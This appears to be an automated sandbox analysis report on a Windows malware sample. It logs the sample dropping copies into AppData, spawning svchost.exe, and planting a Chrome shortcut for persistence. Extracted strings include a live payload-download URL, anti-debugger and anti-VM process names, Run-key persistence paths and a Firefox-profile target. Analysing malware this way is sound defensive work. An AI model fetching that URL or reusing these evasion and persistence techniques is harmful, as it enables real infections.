Code function: 0_2_00007FF6E170529C CoInitializeEx,SHGetFolderPathW,CoCreateInstance,CoUninitialize,

0_2_00007FF6E170529C

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777

Source: C:\Windows\System32\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\ZBI

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File created: C:\Users\user\AppData\Local\Temp\TH5EE3.tmp

Source: fNzx1wx8tL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: fNzx1wx8tL.exe

ReversingLabs: Detection: 69%

Source: fNzx1wx8tL.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: 8711E746C94A2518020777.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: fNzx1wx8tL.exe	String found in binary or memory: wcscpymsvcrt.dllwcscatwcscmpwcsncpywcslenstrlenreallocfreewcsstrCloseHandlekernel32.dllCreateFileWFreeLibraryMoveFileWGetFileSizeExGetWindowsDirectoryAGetVolumeInformationAGetTickCountwsprintfWuser32.dllwsprintfAVirtualAllocReadFileSleepVirtualFreeSetFilePointerCreateDirectoryWFindFirstFileWFindNextFileWFindCloseCopyFileWWriteFileGetSystemDirectoryWExitProcessCreateProcessWShellExecuteWshell32.dllGetModuleFileNameWGetShortPathNameWGetEnvironmentVariableWInternetOpenWwininet.dllInternetOpenUrlWHttpQueryInfoAInternetReadFileInternetConnectWHttpOpenRequestWHttpSendRequestAInternetCloseHandleSHGetFolderPathWSHGetFolderPathASHGetKnownFolderPathPathIsURLWshlwapi.dllPathCombineWPathFindFileNameWRegDeleteKeyWAdvapi32.dllRegOpenKeyExARegSetValueExARegCloseKeyOpenProcessTokenGetTokenInformationAdjustTokenPrivilegesGetUserNameWLookupPrivilegeValueACoUninitializeole32.dllCoCreateInstanceCoInitializeMessageBoxAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3SeDebugPrivilegeReflectiveLoaderSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolderProcessHacker.exeprocexp.exeprocexp64.exeTOTALCMD.exex64dbg.exehttp://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeChromebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemRoot%\system32\svchost.exe%08lX%04lX%luZBI\.exe.lnk\Software\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHiddenServicesUnknown.firefox.exeexplorer.exe\MRT.exe\Mozilla\Firefox\Profiles\*release

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

File read: C:\Users\user\Desktop\fNzx1wx8tL.exe

Source: unknown	Process created: C:\Users\user\Desktop\fNzx1wx8tL.exe "C:\Users\user\Desktop\fNzx1wx8tL.exe"
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe "C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32

Binary contains a suspicious time stamp

Source: Chrome.lnk.0.dr

LNK file: ..\..\..\..\..\8711E746C94A2518020777\8711E746C94A2518020777.exe

Source: fNzx1wx8tL.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: fNzx1wx8tL.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907622064.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908284382.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901212652.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr
Source:	Binary string: ucrtbase.pdb source: A91B.tmp.zx.exe, 0000000B.00000002.1935038429.00007FFE01385000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903601715.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900804995.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905432478.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907164099.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908502115.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: A91B.tmp.zx.exe, 0000000B.00000002.1935221826.00007FFE126E1000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1902399455.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905810924.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905141796.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1906781587.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900933834.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vcruntime140.amd64.pdbGCTL source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1935586245.00007FFE1321E000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.8.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904181487.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900525762.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901075570.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1906461202.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\select.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904577622.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.8.dr
Source:	Binary string: ucrtbase.pdbUGP source: A91B.tmp.zx.exe, 0000000B.00000002.1935038429.00007FFE01385000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: vcruntime140.amd64.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000002.1935586245.00007FFE1321E000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.8.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908933126.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901491052.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905286921.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.8.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903999756.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1900668023.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1906129171.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\python38.pdb source: A91B.tmp.zx.exe, 0000000B.00000002.1934115016.00007FFDFB98D000.00000002.00000001.01000000.0000000B.sdmp, python38.dll.8.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903212710.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907852039.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904391027.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1903807898.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1909129219.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904766573.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1905638202.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1904955189.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1901347580.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908018909.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1902885369.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1902687569.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.8.dr
Source:	Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1907351373.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.8.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: A91B.tmp.zx.exe, 00000008.00000003.1908752595.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.8.dr

Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: fNzx1wx8tL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: ucrtbase.dll.8.dr

Static PE information: 0x81CF5D89 [Wed Jan 5 14:32:41 2039 UTC]

